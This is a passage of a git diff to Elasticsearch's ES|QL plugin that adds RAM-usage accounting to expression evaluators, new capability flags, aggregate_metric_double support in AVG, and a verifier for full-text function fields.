BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java index 8716cb3fee431..85f35350a39d5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java index 15fd009e7046e..ce96ae4fbe14e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class NotEqualsNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java index 9a8b71e8e5eea..b1411723d5080 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java @@ -9,6 +9,7 @@ import org.elasticsearch.Build; import org.elasticsearch.common.util.FeatureFlag; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.features.NodeFeature; import org.elasticsearch.rest.action.admin.cluster.RestNodesCapabilitiesAction; import org.elasticsearch.xpack.esql.core.plugin.EsqlCorePlugin; @@ -889,6 +890,37 @@ public enum Cap { */ AGGREGATE_METRIC_DOUBLE_PARTIAL_SUBMETRICS(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + /** + * Support for rendering aggregate_metric_double type + */ + AGGREGATE_METRIC_DOUBLE_RENDERING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Support for to_aggregate_metric_double function + */ + AGGREGATE_METRIC_DOUBLE_CONVERT_TO(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Support for sorting when aggregate_metric_doubles are present + */ + AGGREGATE_METRIC_DOUBLE_SORTING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Support avg with aggregate metric doubles + */ + AGGREGATE_METRIC_DOUBLE_AVG(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Fixes bug when aggregate metric double is encoded as a single nul value but decoded as + * AggregateMetricDoubleBlock (expecting 4 values) in TopN. + */ + AGGREGATE_METRIC_DOUBLE_SORTING_FIXED(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Stop erroring out when trying to apply MV_EXPAND on aggregate metric double. + */ + AGGREGATE_METRIC_DOUBLE_MV_EXPAND(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + /** * Support change point detection "CHANGE_POINT". */ @@ -912,11 +944,6 @@ public enum Cap { */ SUPPORT_PARTIAL_RESULTS, - /** - * Support for rendering aggregate_metric_double type - */ - AGGREGATE_METRIC_DOUBLE_RENDERING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), - /** * Support for RERANK command */ @@ -968,11 +995,6 @@ public enum Cap { */ NON_FULL_TEXT_FUNCTIONS_SCORING, - /** - * Support for to_aggregate_metric_double function - */ - AGGREGATE_METRIC_DOUBLE_CONVERT_TO(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), - /** * The {@code _query} API now reports the original types. */ @@ -999,11 +1021,6 @@ public enum Cap { */ MAKE_NUMBER_OF_CHANNELS_CONSISTENT_WITH_LAYOUT, - /** - * Support for sorting when aggregate_metric_doubles are present - */ - AGGREGATE_METRIC_DOUBLE_SORTING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), - /** * Supercedes {@link Cap#MAKE_NUMBER_OF_CHANNELS_CONSISTENT_WITH_LAYOUT}. */ @@ -1016,7 +1033,7 @@ public enum Cap { FILTER_IN_CONVERTED_NULL, /** - * When creating constant null blocks in {@link org.elasticsearch.compute.lucene.ValuesSourceReaderOperator}, we also handed off + * When creating constant null blocks in {@link ValuesSourceReaderOperator}, we also handed off * the ownership of that block - but didn't account for the fact that the caller might close it, leading to double releases * in some union type queries. C.f. https://github.com/elastic/elasticsearch/issues/125850 */ @@ -1069,6 +1086,13 @@ public enum Cap { */ DROP_AGAIN_WITH_WILDCARD_AFTER_EVAL, + /** + * Correctly ask for all fields from lookup indices even when there is e.g. a {@code DROP *field} after. + * See + * ES|QL: missing columns for wildcard drop after lookup join #129561 + */ + DROP_WITH_WILDCARD_AFTER_LOOKUP_JOIN, + /** * Support last_over_time aggregation that gets evaluated per time-series */ @@ -1167,6 +1191,11 @@ public enum Cap { */ PARAMETER_FOR_LIMIT, + /** + * Changed and normalized the LIMIT error message. + */ + NORMALIZED_LIMIT_ERROR_MESSAGE, + /** * Dense vector field type support */ @@ -1199,6 +1228,8 @@ public enum Cap { LIKE_WITH_LIST_OF_PATTERNS, + LIKE_LIST_ON_INDEX_FIELDS, + /** * Support parameters for SAMPLE command. */ @@ -1212,10 +1243,31 @@ public enum Cap { */ NO_PLAIN_STRINGS_IN_LITERALS, + /** + * Support for the mv_expand target attribute should be retained in its original position. + * see ES|QL: inconsistent column order #129000 + */ + FIX_MV_EXPAND_INCONSISTENT_COLUMN_ORDER, + /** * (Re)Added EXPLAIN command */ - EXPLAIN(Build.current().isSnapshot()); + EXPLAIN(Build.current().isSnapshot()), + /** + * Support improved behavior for LIKE operator when used with index fields. + */ + LIKE_ON_INDEX_FIELDS, + + /** + * Forbid usage of brackets in unquoted index and enrich policy names + * https://github.com/elastic/elasticsearch/issues/130378 + */ + NO_BRACKETS_IN_UNQUOTED_INDEX_NAMES, + + /** + * Support correct counting of skipped shards. + */ + CORRECT_SKIPPED_SHARDS_COUNT; private final boolean enabled; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java index 55c36aa1cf353..61d0d3b0e1026 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java @@ -28,6 +28,7 @@ import org.elasticsearch.xcontent.XContentBuilder; import java.io.IOException; +import java.util.ArrayList; import java.util.Collections; import java.util.EnumMap; import java.util.Iterator; @@ -562,8 +563,14 @@ public Cluster.Builder setFailedShards(int failedShards) { return this; } - public Cluster.Builder setFailures(List failures) { - this.failures = failures; + public Cluster.Builder addFailures(List failures) { + if (failures.isEmpty()) { + return this; + } + if (this.failures == null) { + this.failures = new ArrayList<>(original.failures); + } + this.failures.addAll(failures); return this; } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java index 93c30470c316c..4afb1418b2585 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java @@ -402,15 +402,17 @@ public static Profile readFrom(StreamInput in) throws IOException { return new Profile( in.readCollectionAsImmutableList(DriverProfile::readFrom), in.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) - ? in.readCollectionAsImmutableList(PlanProfile::readFrom) - : List.of() + || in.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19) + ? in.readCollectionAsImmutableList(PlanProfile::readFrom) + : List.of() ); } @Override public void writeTo(StreamOutput out) throws IOException { out.writeCollection(drivers); - if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN)) { + if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) + || out.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19)) { out.writeCollection(plans); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java index f48c95397dcab..1b48ffd22b491 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java @@ -134,6 +134,7 @@ import static java.util.Collections.emptyList; import static java.util.Collections.singletonList; import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.GEO_MATCH_TYPE; +import static org.elasticsearch.xpack.esql.action.EsqlCapabilities.Cap.IMPLICIT_CASTING_DATE_AND_DATE_NANOS; import static org.elasticsearch.xpack.esql.core.type.DataType.BOOLEAN; import static org.elasticsearch.xpack.esql.core.type.DataType.DATETIME; import static org.elasticsearch.xpack.esql.core.type.DataType.DATE_NANOS; @@ -175,7 +176,7 @@ public class Analyzer extends ParameterizedRuleExecutor( "Resolution", @@ -1819,10 +1820,6 @@ private static boolean canConvertOriginalTypes(MultiTypeEsField multiTypeEsField private static Expression typeSpecificConvert(ConvertFunction convert, Source source, DataType type, InvalidMappedField mtf) { EsField field = new EsField(mtf.getName(), type, mtf.getProperties(), mtf.isAggregatable()); - return typeSpecificConvert(convert, source, field); - } - - private static Expression typeSpecificConvert(ConvertFunction convert, Source source, EsField field) { FieldAttribute originalFieldAttr = (FieldAttribute) convert.field(); FieldAttribute resolvedAttr = new FieldAttribute( source, @@ -1902,23 +1899,42 @@ private static LogicalPlan planWithoutSyntheticAttributes(LogicalPlan plan) { * Cast the union typed fields in EsRelation to date_nanos if they are mixed date and date_nanos types. */ private static class DateMillisToNanosInEsRelation extends Rule { + + private final boolean isSnapshot; + + DateMillisToNanosInEsRelation(boolean isSnapshot) { + this.isSnapshot = isSnapshot; + } + @Override public LogicalPlan apply(LogicalPlan plan) { - return plan.transformUp(EsRelation.class, relation -> { - if (relation.indexMode() == IndexMode.LOOKUP) { - return relation; - } - return relation.transformExpressionsUp(FieldAttribute.class, f -> { - if (f.field() instanceof InvalidMappedField imf && imf.types().stream().allMatch(DataType::isDate)) { - HashMap typeResolutions = new HashMap<>(); - var convert = new ToDateNanos(f.source(), f); - imf.types().forEach(type -> typeResolutions(f, convert, type, imf, typeResolutions)); - var resolvedField = ResolveUnionTypes.resolvedMultiTypeEsField(f, typeResolutions); - return new FieldAttribute(f.source(), f.parentName(), f.name(), resolvedField, f.nullable(), f.id(), f.synthetic()); + if (isSnapshot) { + return plan.transformUp(EsRelation.class, relation -> { + if (relation.indexMode() == IndexMode.LOOKUP) { + return relation; } - return f; + return relation.transformExpressionsUp(FieldAttribute.class, f -> { + if (f.field() instanceof InvalidMappedField imf && imf.types().stream().allMatch(DataType::isDate)) { + HashMap typeResolutions = new HashMap<>(); + var convert = new ToDateNanos(f.source(), f); + imf.types().forEach(type -> typeResolutions(f, convert, type, imf, typeResolutions)); + var resolvedField = ResolveUnionTypes.resolvedMultiTypeEsField(f, typeResolutions); + return new FieldAttribute( + f.source(), + f.parentName(), + f.name(), + resolvedField, + f.nullable(), + f.id(), + f.synthetic() + ); + } + return f; + }); }); - }); + } else { + return plan; + } } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java index 1a2fd81db4b6c..730cccb4dce45 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/capabilities/TranslationAware.java @@ -7,8 +7,11 @@ package org.elasticsearch.xpack.esql.capabilities; +import org.apache.lucene.search.MultiTermQuery.RewriteMethod; import org.elasticsearch.compute.lucene.LuceneTopNSourceOperator; import org.elasticsearch.compute.operator.FilterOperator; +import org.elasticsearch.index.mapper.MappedFieldType; +import org.elasticsearch.index.query.SearchExecutionContext; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.querydsl.query.Query; import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; @@ -47,6 +50,23 @@ static TranslationAware.Translatable translatable(Expression exp, LucenePushdown */ Query asQuery(LucenePushdownPredicates pushdownPredicates, TranslatorHandler handler); + /** + * Translates this expression into a Lucene {@link org.apache.lucene.search.Query}. + *

+ * Implementations should use the provided field type, rewrite method, and search execution context + * to construct an appropriate Lucene query for this expression. + * By default, this method throws {@link UnsupportedOperationException}; override it in subclasses + * that support Lucene query translation. + *

+ */ + default org.apache.lucene.search.Query asLuceneQuery( + MappedFieldType fieldType, + RewriteMethod constantScoreRewrite, + SearchExecutionContext context + ) { + throw new UnsupportedOperationException("asLuceneQuery is not implemented for " + getClass().getName()); + } + /** * Subinterface for expressions that can only process single values (and null out on MVs). */ diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java index 1c21f92053603..6bd3ca2584dc9 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/enrich/AbstractLookupService.java @@ -35,7 +35,7 @@ import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.OrdinalBytesRefBlock; import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -347,8 +347,14 @@ private void doLookup(T request, CancellableTask task, ActionListener warnings ); releasables.add(queryOperator); - var extractFieldsOperator = extractFieldsOperator(shardContext.context, driverContext, request.extractFields); - releasables.add(extractFieldsOperator); + + List operators = new ArrayList<>(); + if (request.extractFields.isEmpty() == false) { + var extractFieldsOperator = extractFieldsOperator(shardContext.context, driverContext, request.extractFields); + releasables.add(extractFieldsOperator); + operators.add(extractFieldsOperator); + } + operators.add(finishPages); /* * Collect all result Pages in a synchronizedList mostly out of paranoia. We'll @@ -370,7 +376,7 @@ private void doLookup(T request, CancellableTask task, ActionListener driverContext, request::toString, queryOperator, - List.of(extractFieldsOperator, finishPages), + operators, outputOperator, Driver.DEFAULT_STATUS_INTERVAL, Releasables.wrap(shardContext.release, localBreaker) @@ -441,6 +447,7 @@ private static Operator extractFieldsOperator( } return new ValuesSourceReaderOperator( driverContext.blockFactory(), + Long.MAX_VALUE, fields, List.of( new ValuesSourceReaderOperator.ShardContext( diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java index d054a8cecb072..81f58cd2f24a0 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/EvalMapper.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.evaluator; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.ann.Evaluator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; @@ -103,6 +104,11 @@ public ExpressionEvaluator.Factory map(FoldContext foldCtx, BinaryLogic bc, Layo record BooleanLogicExpressionEvaluator(BinaryLogic bl, ExpressionEvaluator leftEval, ExpressionEvaluator rightEval) implements ExpressionEvaluator { + + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance( + BooleanLogicExpressionEvaluator.class + ); + @Override public Block eval(Page page) { try (Block lhs = leftEval.eval(page); Block rhs = rightEval.eval(page)) { @@ -115,6 +121,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + /** * Eval blocks, handling {@code null}. This takes {@link Block} instead of * {@link BooleanBlock} because blocks that only contain @@ -171,6 +182,8 @@ static class Attributes extends ExpressionMapper { @Override public ExpressionEvaluator.Factory map(FoldContext foldCtx, Attribute attr, Layout layout, List shardContexts) { record Attribute(int channel) implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Attribute.class); + @Override public Block eval(Page page) { Block block = page.getBlock(channel); @@ -178,6 +191,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + @Override public void close() {} } @@ -206,6 +224,8 @@ static class Literals extends ExpressionMapper { @Override public ExpressionEvaluator.Factory map(FoldContext foldCtx, Literal lit, Layout layout, List shardContexts) { record LiteralsEvaluator(DriverContext context, Literal lit) implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LiteralsEvaluator.class); + @Override public Block eval(Page page) { return block(lit, context.blockFactory(), page.getPositionCount()); @@ -216,6 +236,11 @@ public String toString() { return "LiteralsEvaluator[lit=" + lit + ']'; } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + lit.ramBytesUsed(); + } + @Override public void close() {} } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java index a4a17297abc09..f11d4fbc86967 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/evaluator/mapper/EvaluatorMapper.java @@ -102,6 +102,11 @@ public Block eval(Page page) { return fromArrayRow(driverContext.blockFactory(), expression.fold(ctx))[0]; } + @Override + public long baseRamBytesUsed() { + throw new UnsupportedOperationException("no used"); + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java index bf6affb49a0b2..3d05eb5291435 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistry.java @@ -1129,10 +1129,10 @@ public static FunctionDefinition def( String... names ) { FunctionBuilder builder = (source, children, cfg) -> { - if (children.size() > 1) { + if (children.size() != 1) { throw new QlIllegalArgumentException("expects exactly one argument"); } - Expression ex = children.size() == 1 ? children.get(0) : null; + Expression ex = children.get(0); return ctorRef.build(source, ex, cfg); }; return def(function, builder, names); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java index 9f32a4a740a72..931321bab4b1b 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Avg.java @@ -28,6 +28,7 @@ import static java.util.Collections.emptyList; import static org.elasticsearch.xpack.esql.core.expression.TypeResolutions.ParamOrdinal.DEFAULT; import static org.elasticsearch.xpack.esql.core.expression.TypeResolutions.isType; +import static org.elasticsearch.xpack.esql.core.type.DataType.AGGREGATE_METRIC_DOUBLE; public class Avg extends AggregateFunction implements SurrogateExpression { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry(Expression.class, "Avg", Avg::new); @@ -50,7 +51,7 @@ public Avg( Source source, @Param( name = "number", - type = { "double", "integer", "long" }, + type = { "aggregate_metric_double", "double", "integer", "long" }, description = "Expression that outputs values to average." ) Expression field ) { @@ -65,10 +66,10 @@ public Avg(Source source, Expression field, Expression filter) { protected Expression.TypeResolution resolveType() { return isType( field(), - dt -> dt.isNumeric() && dt != DataType.UNSIGNED_LONG, + dt -> dt.isNumeric() && dt != DataType.UNSIGNED_LONG || dt == AGGREGATE_METRIC_DOUBLE, sourceText(), DEFAULT, - "numeric except unsigned_long or counter types" + "aggregate_metric_double or numeric except unsigned_long or counter types" ); } @@ -105,9 +106,12 @@ public Avg withFilter(Expression filter) { public Expression surrogate() { var s = source(); var field = field(); - - return field().foldable() - ? new MvAvg(s, field) - : new Div(s, new Sum(s, field, filter()), new Count(s, field, filter()), dataType()); + if (field.foldable()) { + return new MvAvg(s, field); + } + if (field.dataType() == AGGREGATE_METRIC_DOUBLE) { + return new Div(s, new Sum(s, field, filter()).surrogate(), new Count(s, field, filter()).surrogate()); + } + return new Div(s, new Sum(s, field, filter()), new Count(s, field, filter()), dataType()); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java index aef221ab6a7e9..4fbe6f22a784f 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Count.java @@ -55,7 +55,7 @@ public class Count extends AggregateFunction implements ToAggregator, SurrogateE ), @Example( description = "To count the number of times an expression returns `TRUE` use " - + "a <> command to remove rows that shouldn’t be included", + + "a [`WHERE`](/reference/query-languages/esql/commands/where.md) command to remove rows that shouldn’t be included", file = "stats", tag = "count-where" ), diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java index 781f9ad67c05c..030b4c08f8c15 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/aggregate/Sample.java @@ -24,6 +24,8 @@ import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.expression.function.Example; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesTo; +import org.elasticsearch.xpack.esql.expression.function.FunctionAppliesToLifecycle; import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; import org.elasticsearch.xpack.esql.expression.function.FunctionType; import org.elasticsearch.xpack.esql.expression.function.Param; @@ -59,7 +61,9 @@ public class Sample extends AggregateFunction implements ToAggregator { "version" }, description = "Collects sample values for a field.", type = FunctionType.AGGREGATE, - examples = @Example(file = "stats_sample", tag = "doc") + examples = @Example(file = "stats_sample", tag = "doc"), + appliesTo = { @FunctionAppliesTo(lifeCycle = FunctionAppliesToLifecycle.GA, version = "9.1.0") } + ) public Sample( Source source, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java index 5510fbddd27c7..ec29b4b658c76 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/FullTextFunction.java @@ -14,6 +14,7 @@ import org.elasticsearch.compute.lucene.LuceneQueryScoreEvaluator; import org.elasticsearch.compute.operator.EvalOperator; import org.elasticsearch.compute.operator.ScoreOperator; +import org.elasticsearch.index.IndexMode; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; import org.elasticsearch.xpack.esql.capabilities.TranslationAware; @@ -314,6 +315,45 @@ private static FullTextFunction forEachFullTextFunctionParent(Expression conditi return null; } + public static void fieldVerifier(LogicalPlan plan, FullTextFunction function, Expression field, Failures failures) { + var fieldAttribute = fieldAsFieldAttribute(field); + if (fieldAttribute == null) { + plan.forEachExpression(function.getClass(), m -> { + if (function.children().contains(field)) { + failures.add( + fail( + field, + "[{}] {} cannot operate on [{}], which is not a field from an index mapping", + m.functionName(), + m.functionType(), + field.sourceText() + ) + ); + } + }); + } else { + // Traverse the plan to find the EsRelation outputting the field + plan.forEachDown(p -> { + if (p instanceof EsRelation esRelation && esRelation.indexMode() != IndexMode.STANDARD) { + // Check if this EsRelation supplies the field + if (esRelation.outputSet().contains(fieldAttribute)) { + failures.add( + fail( + field, + "[{}] {} cannot operate on [{}], supplied by an index [{}] in non-STANDARD mode [{}]", + function.functionName(), + function.functionType(), + field.sourceText(), + esRelation.indexPattern(), + esRelation.indexMode() + ) + ); + } + } + }); + } + } + @Override public EvalOperator.ExpressionEvaluator.Factory toEvaluator(ToEvaluator toEvaluator) { List shardContexts = toEvaluator.shardContexts(); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java index 53aa87f4b861a..e6d99d158aaaf 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/expression/function/fulltext/Match.java @@ -15,7 +15,6 @@ import org.elasticsearch.common.unit.Fuzziness; import org.elasticsearch.index.query.QueryBuilder; import org.elasticsearch.xpack.esql.capabilities.PostAnalysisPlanVerificationAware; -import org.elasticsearch.xpack.esql.common.Failure; import org.elasticsearch.xpack.esql.common.Failures; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import 